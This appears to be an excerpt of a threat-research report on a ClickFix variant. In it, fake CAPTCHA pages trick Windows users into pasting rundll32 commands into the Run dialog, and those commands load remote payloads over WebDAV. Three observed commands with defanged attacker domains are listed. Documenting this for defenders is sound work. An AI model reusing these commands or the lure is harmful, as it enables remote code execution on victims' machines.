Quote:A new variant of the ClickFix attack technique that shifts execution away from commonly monitored tools like PowerShell and mshta, instead abusing native Windows components such as rundll32.exe and WebDAV.

This evolution allows attackers to bypass traditional script-based detection mechanisms, increasing the likelihood of a successful, stealthy compromise.

The attack begins similarly to earlier ClickFix campaigns. Victims are lured to a phishing website disguised as a CAPTCHA page, such as “healthybyhillary[.]com.”

The CyberProof Threat Research Team has observed a new variant of the ClickFix technique, where attackers manipulate the user into executing a malicious command on their own device through the Win + R shortcut. 


Phishing Website (Source : CyberProof).

The page instructs users to open the Windows Run dialog using “Win + R,” paste a command, and press Enter. This social engineering trick convinces users to execute malicious commands themselves.

Observed commands include:

• rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.
  
• rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.
  
• rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.
  

These commands leverage the Windows WebDAV mini-redirector using the \server@port syntax. This allows remote files hosted over HTTP (port 80) to be accessed like local network shares.

Continue Reading...